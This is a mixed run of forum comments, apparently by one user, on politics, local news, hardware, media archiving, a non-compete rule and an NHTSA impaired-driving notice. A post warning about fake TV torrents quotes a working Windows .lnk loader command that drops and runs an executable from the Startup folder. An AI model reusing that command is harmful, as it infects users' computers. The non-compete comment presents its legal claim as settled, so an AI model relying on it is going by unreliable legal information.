I was in Spain a few years ago, and decided against certain mementos for this reason. Sorry, it may not be KKK, but I won't display a whirling log in my house for similar reasons..
The first hit is always free.

When I was in elementary school, we came home from shopping and discovered someone had pried off the lock and stolen my bike. I was inconsolable. About an hour later I spotted a kid from my class riding my bike, and managed to recover it.
I looked that guy up a few years ago. Found him on the sex offender registry.
In high school, one of my classmates shot and killed his sister's friend while cleaning a .22 rifle. There was a trial, but I don't remember the verdict. As a minor, it might have been sealed. He disappeared for about a year. When he came back, he was completely withdrawn and...changed.

There was a guy at my high school that was just an absolute jackass. One of those guys that you know is never going to amount to anything, and will probably be in prison shortly after graduation. He disappeared my junior year, I thought he had moved.
I looked that guy up a few years ago. Actually, he had broken into someone's house (a burglary) and beat the shit out of the homeowner when he was discovered. But he'd also been held back in school a couple times, so he was 18 when he did it. When I looked him up, he had just been released from prison.
Anyone surprised by this, please raise your right arm up at an angle, palm facing forward.
This isn't liminal, just unfurnished. And nighttime.
Instead of having some form of verifiable indication, people are just supposed to "think hard"? Have you looked around lately?
The problem only gets worse with AI creeping closer.
What? I prefer knowing if someone I interact with is genuine. As opposed to Twitter, where I just know they have a recurring monthly payment.
I don't know...seems like an impossible task.
Do I have to do it tonight, or can there be a 'waiting period'? (I have nothing to wear...)
A couple weeks before the inauguration, I listened to the President/CEO of the company I work at go on an absolute rant about how Trump was going to get rid of all Biden's DEI hires, about how the Navy Chief was a woman and she would be fired, about how the fastest running time for a woman was slower than the slowest running time for a man(???), and some other, racist stuff.
I lost my train of thought...what happened?
According to this administration, the correct term is 'cosmonaut'.
Are you saying we all need to install a continually rotating VPN when we're surfing the internet? As chaff?
Here boy, here boy, drop the eggs...good boy, drop the eggs...
Yeah, and when you burn that fuel it gets hotter, and that makes it a little lighter too.
Don't forget to account for all the helium leaking out of balloons. That's part of the reason the earth gets lighter too.
Not later than 90 days after the date of the enactment of this Act, the head of each agency shall require any special Government employee in a sensitive position at the agency on the date of the enactment of this Act to be entered into a random drug testing program in accordance with the Mandatory Guidelines for Federal Workplace Drug Testing Programs.
Immigrant rights advocates are concerned what happened outside a Michigan courthouse may be part of a larger problem.

In 50 years, history will speak about ICE the way we speak about the SS now.

Perhaps it's not working because of people like Slotkin willing to continue the losing strategies of the past.
A Walgreens clerk biking home was hurt badly in a hit-and-run crash. The community has since rallied to buy him a car.

TJ Day liked riding his bike to and from work at Walgreens. It helped him stay fit and gave him time to wind down in the evening.
He wore a reflective vest, helmet and added lights to the front and back of his bike for safety. He did everything right, said his sister Kelli Day.
Still, TJ was hit by a car on his way home from work on Feb. 18.
Another driver who found him in a snowbank on Lovers Lane near Stryker Way after the hit-and-run. That driver stayed in contact, and later offered to buy TJ a new bike. But in the meantime, supporters of TJ had already raised more than $20,000 to buy him a car.
As of Thursday, March 6, a GoFundMe Kelli organized has raised $23,427, with a goal of $28,000.
TJ has always been apprehensive about driving, but now he’s more nervous of biking, Kelli said. The generosity of his community will help him get a safe and reliable car.
I have Sonarr and Radarr set up to keep me up to date on some TV shows. Lately I've gotten a handful of files that Sonarr refuses to import because of a .lnk file. The download consists of a folder with the name of the file I want. Inside the folder is a file with the same name, and a .lnk extension. The .lnk file is very big (950Mb), and programmed to run this script:
%ComSpec% /v:On/CSET el=Severance.S02E07.1080p.WEB.H264-SuccessfulCrab.mkv&SET c="%Appdata%\microsoft\windows\START MENU\PROGRAMS\STARTUP\%Username%.exe"&(If not exist !c! Findstr/v "cmd.EXE Rj%TIME:7,1%%TIME:-2%" !el!.Lnk>!c!&Start "" !c!)&CD %tmp%&Echo.>!
As far as I can tell, this creates an empty executable file in your Windows startup folder, and copies a portion of the fake video file into it. It then runs the malware. And, since it's in your startup folder, it will run again every time you reboot.
The tracker is theRARBG, but it could also come from elsewhere. I've found it on a couple of different shows (not just this one), and they always download a couple of days before the airdate.
Be careful!
I can't think of any. The current oil reserve is supposed to be used in the case of another oil embargo. But its actual use is to lower gas prices when the administration in power needs a political win.
I actually think the purpose of a Bitcoin reserve is to temporarily increase the price so tech-bros (re: Elon) can sell at a massive profit. Then buy back at a much lower price. It's just a way to indirectly transfer federal dollars into administration pockets.
I can't find any reason for the government to buy crypto and hold it in reserve.

Remember when Donald Trump was president, in the lobotomized body of Bill the Cat? Haha good times.
I've seen a lot of official MST3K (Mystery Science Theater 3000, ya boob) getting streamed on Youtube. I have a lot of these already from quite a while ago, sourced from various places. Some from my own DVD rips (thanks Netflix), downloaded DVD rips, and a small amount of "lost" content coming from VHS rips off broadcast.
Are the Youtube streams worth archiving? I was specifically looking at a livestream for Season 1 that "includes lost host segments". I was going to download it through Newpipe, but I didn't see the option on this stream (granted, I didn't look too deeply).
Are these streams worth the time if I already have the episodes? Have they been cleaned-up in any way?
This goes into effect September 4, 2024. Employers with existing non-compete agreements must post the notice on page 163 (38504). After that date you may accept a job offer from anybody, including a direct competitor, and not worry about violating any non-compete agreement.
B760 GAMING PLUS WIFI is designed with tons of connectivity, flexible tools, and convenient Wi-Fi solution with DDR5 memory version for gamers who want all.

I recently bought this motherboard, based on descriptions on pcpartpicker.com and B&H's website. Both sites claim the board has 5 PCIe x16 slots (2x version 4, and 3x version 3). But I have the board in front of me, and while it certainly has full length slots, most of the pins are missing in all but one of them. Closer examination of the MSI website has this to say:
-
5x PCI-E x16 slot
-
PCI_E1 Gen PCIe 4.0 supports up to x16 (From CPU)
-
PCI_E2 Gen PCIe 3.0 supports up to x1 (From Chipset)
-
PCI_E3 Gen PCIe 4.0 supports up to x4 (From Chipset)
-
PCI_E4 Gen PCIe 3.0 supports up to x1 (From Chipset)
-
PCI_E5 Gen PCIe 3.0 supports up to x1 (From Chipset)
Have I been swindled? Am I just stupid or ignorant?
From my previous comment, it looks like NHTSA is moving faster than I predicted. We're now at step 1, with this Advance Notice of Proposed Rulemaking.
(edit: I jumped the gun, we're still at step '0' on my original list)
Most of this notice seems to be a report on why 'impaired driving' is bad. I see alcohol, cannabis, mobile phone use, drowsiness...etc.
>Due to technology immaturity and a lack of testing protocols, drugged driving is not being considered in this advance notice of proposed rulemaking.
Makes sense.
>There is no clear and consistent engineering or industry definition of ‘‘impairment.’’
Yep, another unclear request by Congress.
>NHTSA believes that Congress did not intend to limit NHTSA’s efforts under BIL to alcohol impairment.
Okay, that's fair.
>Camera-based-systems, however, are increasingly feasible and common in vehicles.
Uh-oh...
>The Safety Act also contains a ‘‘make inoperative’’ provision, which prohibits certain entities from knowingly modifying or deactivating any part of a device or element of design installed in or on a motor vehicle in compliance with an applicable FMVSS. Those entities include vehicle manufacturers, distributors, dealers, rental companies, and repair businesses. Notably, the make inoperative prohibition does not apply to individual vehicle owners. While NHTSA encourages individual vehicle owners not to degrade the safety of their vehicles or equipment by removing, modifying, or deactivating a safety system, the Safety Act does not prohibit them from doing so. This creates a potential source of issues for solutions that lack consumer acceptance, since individual owners would not be prohibited by Federal law from removing or modifying those systems (i.e., using defeat mechanisms).
Note that "make inoperative" does not apply to a "kill switch" in this case. NHTSA uses the term to mean "disabling required safety devices". For example, as an individual vehicle owner, it's perfectly legal for you to remove the seatbelts from your car, despite Federal requirements. But it's illegal for the entities listed above to do it. (This example doesn't extend to state regulations. It's legal for you to remove your seatbelts, but may still be illegal to drive a car without them.)
There's a short 'discussion' here regarding how to passively detect impaired driving, noting the difficulties of creating such a system. Followed by a note that basically says if they can't do it within 10 years, NHTSA can give up and not do it, as stated in the Infrastructure law.
There's a long section on how to detect various types of impairment, current methods of preventing impaired driving, etc. An interesting section about detecting blood-alcohol level using infrared sensors embedded in the steering wheel. Body posture sensors can be used to detect driver distraction.
This is followed by a brief overview of the technologies NHTSA is considering:
>Camera-Based Driver Monitoring Sensors
>Hands-On-Wheel Sensors
>Lane Departure and Steering Sensors
>Speed/Braking Sensors
>Time-Based Sensors
>Physiological Sensors
On page 850 (21 of the PDF), NHTSA asks for feedback to several questions. There are a few pages of relevant issues, so I won't cover them here. If you wish, you can go here to leave a comment. Please don't leave irrelevant garbage like "I oppose this on the grounds of my Constitutional rights..." While applicable in this situation, it's irrelevant to NHTSA, and commenting like that will just waste everybody's time. There's a section on page 855 (26 of the PDF) about Privacy and Security.
That's that. Let me know I can answer any of your questions. I'll try to come back to this post throughout the day and see what's happening. But, I do not work for NHTSA, so can't remark on agency thought process.
